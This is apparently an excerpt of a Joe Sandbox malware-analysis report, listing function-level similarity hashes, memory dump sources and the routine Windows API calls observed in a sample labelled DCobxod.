                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                               • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: H_prolog_swprintf
                                                              • String ID: CMT$h%u$hc%u
                                                              • API String ID: 146138363-3282847064
                                                              • Opcode ID: d5170ce4ed2e8aedf95d8904d38707a6941c34f744e7ec6a1943c43cdf67d173
                                                              • Instruction ID: 691239f45e7ef0c6a62c4fc45582a63b11e2cdd1bbe50415ab46bc9bf2e06723
                                                              • Opcode Fuzzy Hash: d5170ce4ed2e8aedf95d8904d38707a6941c34f744e7ec6a1943c43cdf67d173
                                                              • Instruction Fuzzy Hash: 8532D6715143849FDB14DF74C895AEA3BA5AF15304F04047FFD8A8B282DB78AA89CB54
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00412874
                                                              • _strlen.LIBCMT ref: 00412E3F
                                                                • Part of subcall function 004202BA: __EH_prolog.LIBCMT ref: 004202BF
                                                                • Part of subcall function 00421B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0041BAE9,00000000,?,?,?,0001041E), ref: 00421BA0
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00412F91
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                              • String ID: CMT
                                                              • API String ID: 1206968400-2756464174
                                                              • Opcode ID: e3bae58d5c57742e92904a76f5331dd868b21cabaddd366a6966d5b69c20ff2d
                                                              • Instruction ID: 4151f5fa6b8ca1d2cd943b28ac6cf38b30aa7ed3daf03ff9d30b2ee0c29e6718
                                                              • Opcode Fuzzy Hash: e3bae58d5c57742e92904a76f5331dd868b21cabaddd366a6966d5b69c20ff2d
                                                              • Instruction Fuzzy Hash: 2C6208716002448FDB19DF34C9857EA3BA1AF54304F08457FEC9ACB382D7B9A995CB68
                                                              APIs
                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0042F844
                                                              • IsDebuggerPresent.KERNEL32 ref: 0042F910
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042F930
                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 0042F93A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                              • String ID:
                                                              • API String ID: 254469556-0
                                                              • Opcode ID: 070dee31bb596d5077f59c2fe75f40ef8f8ccefddebe2cf96f03fb4cba0fb541
                                                              • Instruction ID: 4d0ca39a79fa093e518cf48f589dc3bddf380276afe8a6648db970d15ac1acec
                                                              • Opcode Fuzzy Hash: 070dee31bb596d5077f59c2fe75f40ef8f8ccefddebe2cf96f03fb4cba0fb541
                                                              • Instruction Fuzzy Hash: 1A312C75D0522D9BDF10DFA4D9897CDBBB8AF04704F5041EAE40CA7250EB759B888F48
                                                              APIs
                                                              • VirtualQuery.KERNEL32(80000000,0042E5E8,0000001C,0042E7DD,00000000,?,?,?,?,?,?,?,0042E5E8,00000004,00471CEC,0042E86D), ref: 0042E6B4
                                                              • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,0042E5E8,00000004,00471CEC,0042E86D), ref: 0042E6CF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: InfoQuerySystemVirtual
                                                              • String ID: D
                                                              • API String ID: 401686933-2746444292
                                                              • Opcode ID: b120c3ae7e5695230b187692ca72a6050fc7fcaa9e8cca3424a9912f7bc19c26
                                                              • Instruction ID: 249871789677129aeb672b61de4b88ad00a5508495b02f8c1a39077ba1842e4c
                                                              • Opcode Fuzzy Hash: b120c3ae7e5695230b187692ca72a6050fc7fcaa9e8cca3424a9912f7bc19c26
                                                              • Instruction Fuzzy Hash: 5A012B327001196BDF14DF6ADC09BDE7BAAEFC4324F0CC121ED19D7250D638D9058684
                                                              APIs
                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00438FB5
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00438FBF
                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00438FCC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                              • String ID:
                                                              • API String ID: 3906539128-0
                                                              • Opcode ID: a66711f9b7882037adf9b21fb4fc27a251335b401d0b7827b283469eee87f13a
                                                              • Instruction ID: 4911cae4c6a9543047ab24b695c839a37dcbe96b664d0310a134d04e759857c5
                                                              • Opcode Fuzzy Hash: a66711f9b7882037adf9b21fb4fc27a251335b401d0b7827b283469eee87f13a
                                                              • Instruction Fuzzy Hash: F231C675901328ABCB21DF65DD89B9DBBB8BF08710F5041EAE41CA7250EB749F858F48
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .
                                                              • API String ID: 0-248832578
                                                              • Opcode ID: a9483511606fa418245ed192ebee8d6ec82f54cd2acb0e8425250adfac34ba3d
                                                              • Instruction ID: 312d5405fd1994169ece6083565ddf5bbddb0b39f0879bd705af9635777417dd
                                                              • Opcode Fuzzy Hash: a9483511606fa418245ed192ebee8d6ec82f54cd2acb0e8425250adfac34ba3d
                                                              • Instruction Fuzzy Hash: BF3126719002596FCB248E79CC84EFB7BBDDB89304F1441AEEA1887252E7389E458B94
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                              • Instruction ID: 867faa2f8840e62cb4b5ff3bf08d6cb63cb7d74342dccb71de6b56f82a96fe06
                                                              • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                              • Instruction Fuzzy Hash: 7E023C71E002199BDF18DFA9D9806AEF7F1EF48324F25816AD919E7384D734AE41CB84
                                                              APIs
                                                              • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0042AF35
                                                              • GetNumberFormatW.KERNEL32(00000400,00000000,?,0044E72C,?,?), ref: 0042AF84
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: FormatInfoLocaleNumber
                                                              • String ID:
                                                              • API String ID: 2169056816-0
                                                              • Opcode ID: 10f34b7c3f323989380067b3ca723ddd81d98cf0c265bb33df8d056799e9c838
                                                              • Instruction ID: 5104f7e8726d40d7a56c6a9d140de3bb769c3d1ca99669ffa1cb45b2d9f571f0
                                                              • Opcode Fuzzy Hash: 10f34b7c3f323989380067b3ca723ddd81d98cf0c265bb33df8d056799e9c838
                                                              • Instruction Fuzzy Hash: 1C01713A110308AAD7109F65EC45F9B77BCFF09710F409032FA0597151E3749928CBA9
                                                              APIs
                                                              • GetLastError.KERNEL32(00416DDF,00000000,00000400), ref: 00416C74
                                                              • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00416C95
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: ErrorFormatLastMessage
                                                              • String ID:
                                                              • API String ID: 3479602957-0
                                                              • Opcode ID: 65596869005e91f7b11f39050df6f14ed5df7ba9492e8933a347fdd3c675a93e
                                                              • Instruction ID: fed67bfde4f8af0513da46ce36d964c0532d479defe6c7a9a2bc595fe98177e1
                                                              • Opcode Fuzzy Hash: 65596869005e91f7b11f39050df6f14ed5df7ba9492e8933a347fdd3c675a93e
                                                              • Instruction Fuzzy Hash: 2AD0A934344300BFFA100F219C06F6B7BA9BF42F46F18C014B388E80E0EA78C460A62D
                                                              APIs
                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004419EF,?,?,00000008,?,?,0044168F,00000000), ref: 00441C21
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: ExceptionRaise
                                                              • String ID:
                                                              • API String ID: 3997070919-0
                                                              • Opcode ID: 32335a8cdacb923212c9b8fd6814811debdef1695ec61153b01c1dbf8ed48862
                                                              • Instruction ID: 2dafb633b2cc0822717070fbc5653d473c07f7417efd3b8463ea3cf7389d93d0
                                                              • Opcode Fuzzy Hash: 32335a8cdacb923212c9b8fd6814811debdef1695ec61153b01c1dbf8ed48862
                                                              • Instruction Fuzzy Hash: 40B13B316106089FE715CF28C48AB657BE0FF45365F258659E89ACF3A1C339E992CB48
                                                              APIs
                                                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0042F66A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: FeaturePresentProcessor
                                                              • String ID:
                                                              • API String ID: 2325560087-0
                                                              • Opcode ID: 7171d46c9ede4ce1b9b3ed3990ebe547a9310d61aca4ce659611141a3ec6f746
                                                              • Instruction ID: 8114e03b32756099685bc0a35c5a9b738131b0dd801ec96db31308ecba39b557
                                                              • Opcode Fuzzy Hash: 7171d46c9ede4ce1b9b3ed3990ebe547a9310d61aca4ce659611141a3ec6f746
                                                              • Instruction Fuzzy Hash: 7251A275A006158FEB24CF99E9857ABB7F0FB88314FA4843AC405EB360D378A944CF58
                                                              APIs
                                                              • GetVersionExW.KERNEL32(?), ref: 0041B16B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: Version
                                                              • String ID:
                                                              • API String ID: 1889659487-0
                                                              • Opcode ID: 613937a218ada4c4e986b148c4bd55fed12a5d92c6e66b19d62dfa405573c925
                                                              • Instruction ID: 1207649c58c36e78ffb56047e76b97acab95f9afb633f7daf6bed6898a3b7311
                                                              • Opcode Fuzzy Hash: 613937a218ada4c4e986b148c4bd55fed12a5d92c6e66b19d62dfa405573c925
                                                              • Instruction Fuzzy Hash: 94F06DB8D002188FCB18CB28EC916D573F1F748756F1006A6D519933A1C374EDC0CEA8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: gj
                                                              • API String ID: 0-4203073231
                                                              • Opcode ID: 15cdc346ff704bbf35f525a05f9e0c15aa1c534060a630dd9e1a5fb70bb76a3b
                                                              • Instruction ID: f3d4ac73706b2eda677c30fccd4b21f5f3494103ff9a1bf2de87ddb90bf8ea38
                                                              • Opcode Fuzzy Hash: 15cdc346ff704bbf35f525a05f9e0c15aa1c534060a630dd9e1a5fb70bb76a3b
                                                              • Instruction Fuzzy Hash: ACC14672A183818FC354CF29D88065AFBE1BFC8708F19892EE998D7311D734E955CB96
                                                              APIs
                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,0042F3A5), ref: 0042F9DA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled
                                                              • String ID:
                                                              • API String ID: 3192549508-0
                                                              • Opcode ID: 9803ef72d6b6dab1369ba84da18d64664ec94d1e5f0a4d6e24aa7a3243b7ad8e
                                                              • Instruction ID: 23803263b07fc7dd1bc1da7598986779497cc098e902aa70e3d86d8b015cbb0e
                                                              • Opcode Fuzzy Hash: 9803ef72d6b6dab1369ba84da18d64664ec94d1e5f0a4d6e24aa7a3243b7ad8e
                                                              • Instruction Fuzzy Hash:
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: HeapProcess
                                                              • String ID:
                                                              • API String ID: 54951025-0
                                                              • Opcode ID: e7e3ba06a173477f763c83808f855e857978023183bbe4535255371c269e1081
                                                              • Instruction ID: 4e081ef1a1445f70b8bbd8cadcff9f3dfbfb84675ca64a3830aaa4c21abc30b3
                                                              • Opcode Fuzzy Hash: e7e3ba06a173477f763c83808f855e857978023183bbe4535255371c269e1081
                                                              • Instruction Fuzzy Hash: 3DA01130A022008B83808F30AF0820C3AA8AA02A82308003AA008C0020EA2080A0AA08
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                              • Instruction ID: 0df97ba2a5aa4d7fe36d5cbe1d5b7ab7f14cccdb44788631380a397cbf8f1eb2
                                                              • Opcode Fuzzy Hash: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                              • Instruction Fuzzy Hash: DF6247717047948FCB25CF28D4806BABBE1AF95304F49896FD8DA8B342D738E945CB19
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                              • Instruction ID: d2f31ed715fb205b41963641780670586a4254de52df704cc18e83e8e3f6840e
                                                              • Opcode Fuzzy Hash: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                              • Instruction Fuzzy Hash: 6862177170C3548FCB15CF28D9806BABBE1BF95304F48896EE89A8B346D734E945CB19
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                              • Instruction ID: a4a8a8b9e8ab92a6a01c686b41750ecbbb1397be26bbc58452a6fba6d44d0720
                                                              • Opcode Fuzzy Hash: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                              • Instruction Fuzzy Hash: 36525A72A087018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
